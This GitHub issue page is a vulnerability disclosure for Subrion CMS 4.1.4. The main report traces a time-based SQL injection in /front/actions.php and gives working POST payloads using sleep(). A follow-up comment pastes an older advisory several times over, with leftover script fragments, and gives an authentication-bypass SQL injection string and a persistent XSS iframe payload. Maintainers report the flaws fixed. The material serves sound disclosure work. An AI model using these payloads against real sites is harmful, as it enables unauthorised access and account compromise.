Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Subrion cms 4.1.4 sql injection in /front/actions.php #480

Closed
jgj212 opened this issue Jul 2, 2017 · 4 comments
Closed

Subrion cms 4.1.4 sql injection in /front/actions.php #480

jgj212 opened this issue Jul 2, 2017 · 4 comments
Labels
Milestone

Comments

@jgj212
Copy link

jgj212 commented Jul 2, 2017

Subrion cms 4.1.4 sql injection in /front/actions.php

description

Subrion cms 4.1.4 has a sql injection because $POST

details

critical code in /front/actions.php, $POST is passed to deleteUploadedFile with no checking

        case 'delete-file':
            if (!empty($_POST['item']) && !empty($_POST['itemid']) && !empty($_POST['field']) && !empty($_POST['file'])) {
                $output = $iaCore->factory('field')->deleteUploadedFile($_POST['field'], $_POST['item'], $_POST['itemid'], $_POST['file'], true)
                    ? ['error' => false, 'message' => iaLanguage::get('deleted')]
                    : ['error' => true, 'message' => iaLanguage::get('error')];
            }

            break;

deleteUploadedFile in /includes/classes/ia.core.field.php:

	public function deleteUploadedFile($fieldName, $itemName, $itemId, $fileName = null, $checkOwnership = false)
    {
        $tableName = $this->iaCore->factory('item')->getItemTable($itemName);

        if ($checkOwnership) {
            if (!iaUsers::hasIdentity()) {
                return false;
            }

            $memberIdColumn = (iaUsers::getItemName() == $itemName) ? iaDb::ID_COLUMN_SELECTION : 'member_id';
            $row = $this->iaDb->row([$memberIdColumn, $fieldName], iaDb::convertIds($itemId), $tableName);

            if (!$row || iaUsers::getIdentity()->id != $row[$memberIdColumn]) {
                return false;
            }

            $itemValue = $row[$fieldName];
        } else {
            $itemValue = $this->iaDb->one([$fieldName], iaDb::convertIds($itemId), $tableName);
        }

        //...more code...

        return false;
    }

There is a checking "checkOwnership", it means that anonymous user will be blocked as "return false", but any registered user will continue. So $fileName will be passed to row, and it is from $_POST['field'].

the row function has the code, it purpose is to construct sql statement and excute with no checking:

    public function row($fields = self::ALL_COLUMNS_SELECTION, $condition = '', $tableName = null, $start = 0)
    {
        if (is_null($tableName)) {
            $result = $this->_get('row', $fields, $condition, $start, 1);
        } else {
            $this->setTable($tableName);
            $result = $this->_get('row', $fields, $condition, $start, 1);
            $this->resetTable();
        }

        return $result;
    }

	
    protected function _get($type, $fields, $condition = '', $start = 0, $limit = null)
    {
        $stmtFields = $fields;

        if (is_array($fields)) {
            $stmtFields = '';
            foreach ($fields as $key => $field) {
                $stmtFields .= is_int($key)
                    ? '`' . $field . '`'
                    : sprintf('%s `%s`', is_numeric($field) ? $field : '`' . $field . '`', $key);
                $stmtFields .= ', ';
            }
            $stmtFields = substr($stmtFields, 0, -2);
        }

        if ($condition) {
            $condition = ' WHERE ' . $condition;
        }
        if ($limit && stripos($condition, 'limit') === false) {
            $condition .= ' LIMIT ' . $start . ', ' . $limit;
        }

        $sql = 'SELECT ' . $stmtFields . ' FROM `' . $this->_table . '` ' . $condition;

        switch ($type) {
            case 'all':
                return $this->getAll($sql);
            case 'keyval':
                return $this->getKeyValue($sql);
            case 'assoc':
                return $this->getAssoc($sql, true);
            default:
                return $this->getRow($sql);
        }
    }
	

So there is a post-type sql injection, because this sql injection has no echo, we can use time-based sql injection to test with a normal user account.

sleep(0)

url: http://localhost/subrion/actions.json
postdata: action=delete-file&item=members&itemid=1&field=email or sleep(0) ,username&file=123
time-echo:
time1

sleep(3)

url: http://localhost/subrion/actions.json
postdata: action=delete-file&item=members&itemid=1&field=email or sleep(3) ,username&file=123
time-echo:
time3

Credit: ADLab of VenusTech

ghost pushed a commit that referenced this issue Jul 3, 2017
@ghost
Copy link

ghost commented Jul 6, 2017

Hello @jgj212! Many thanks for the report.

Fix provided and the critical upgrade patch has been released. It's automatically installed on each script and provides this fix to the script.

@ghost ghost closed this as completed Jul 6, 2017
@vbezruchkin vbezruchkin added the bug label Jul 6, 2017
@vbezruchkin vbezruchkin modified the milestone: 4.1.6 Jul 6, 2017
@gesonchi
Copy link

1.SUBRION CMS multiple vulnerabilties

vendor: www.subrion.com

Author: Karthik R (3psil0nLambDa)

Email: [email protected]<SCRIPT type=text/javascript>

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("cf_email");a=l.className;if(a){s=;r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</SCRIPT>

My blog: epsilonlambda.co.cc

Google dork: © 2011 Powered by Subrion CMS


Description about the CMS

Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrions highly scalable set of key features makes it a powerful

platform for web sites.

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.


  • SQLi Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the site.

Exploit: Username: or 0=0 #

 Password: or 0=0 # 
  • Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert(XSS);"></IFRAME>

  • Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.

1.SUBRION CMS multiple vulnerabilties

vendor: www.subrion.com

Author: Karthik R (3psil0nLambDa)

Email: [email protected]<SCRIPT type=text/javascript>

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("cf_email");a=l.className;if(a){s=;r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</SCRIPT>

My blog: epsilonlambda.co.cc

Google dork: © 2011 Powered by Subrion CMS


Description about the CMS

Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrions highly scalable set of key features makes it a powerful

platform for web sites.

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.


  • SQLi Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the site.

Exploit: Username: or 0=0 #

 Password: or 0=0 # 
  • Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert(XSS);"></IFRAME>

  • Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.

1.SUBRION CMS multiple vulnerabilties

vendor: www.subrion.com

Author: Karthik R (3psil0nLambDa)

Email: [email protected]<SCRIPT type=text/javascript>

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("cf_email");a=l.className;if(a){s=;r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</SCRIPT>

My blog: epsilonlambda.co.cc

Google dork: © 2011 Powered by Subrion CMS


Description about the CMS

Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrions highly scalable set of key features makes it a powerful

platform for web sites.

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.


  • SQLi Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the site.

Exploit: Username: or 0=0 #

 Password: or 0=0 # 
  • Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert(XSS);"></IFRAME>

  • Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.

1.SUBRION CMS multiple vulnerabilties

vendor: www.subrion.com

Author: Karthik R (3psil0nLambDa)

Email: Karthik.cupid@gmail.com<SCRIPT type=text/javascript>

/* <![CDATA[ */

(function(){try{var s,a,i,j,r,c,l=document.getElementById("cf_email");a=l.className;if(a){s=;r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();

/* ]]> */

</SCRIPT>

My blog: epsilonlambda.co.cc

Google dork: © 2011 Powered by Subrion CMS


Description about the CMS

Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrions highly scalable set of key features makes it a powerful

platform for web sites.

Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.


  • SQLi Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the site.

Exploit: Username: or 0=0 #

 Password: or 0=0 # 
  • Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert(XSS);"></IFRAME>

  • Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.

1.SUBRION CMS multiple vulnerabilties
vendor: www.subrion.com
Author: Karthik R (3psil0nLambDa)
Email: <A href="mailto:Karthik.cupid@gmail.comKarthik.cupid@gmail.com<SCRIPT type=text/javascript>
/* */
</SCRIPT>
My blog: www.2cto.com Google dork: © 2011 Powered by Subrion CMS


Description about the CMS

Subrion CMS unites the functionality of articles script, auto classifieds script, realty classifieds script, and web directory script all in one package. Subrions highly scalable set of key features makes it a powerful
platform for web sites.
Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites. You can be confident that you will be able to invest in this system and continue to grow it to any possible level.


  • SQLi Vulnerability

The attackers can use the authentication bypass to get in to the admin panel in the site.

Exploit: Username: or 0=0 #
Password: or 0=0 #

  • Persistent XSS vulnerability

The Poll module,Manage pages are vulnerable to persistent XSS in the title field.

Exploit: "><IFRAME SRC="javascript:alert(XSS);"></IFRAME>

  • Products like: Auto Classifieds, Articles Script, Auto Classifieds, Real estate script, Web directory run on the same CMS, and hence are vulnerable too.

@attritionorg
Copy link

@Batry, did you see @gesonchi follow-up with more vulns?

@vbezruchkin
Copy link
Member

All these reports have been fixed and released in our latest version. So there is no known issues in our Subrion 4.1.5.20 version.

Thanks

This issue was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

4 participants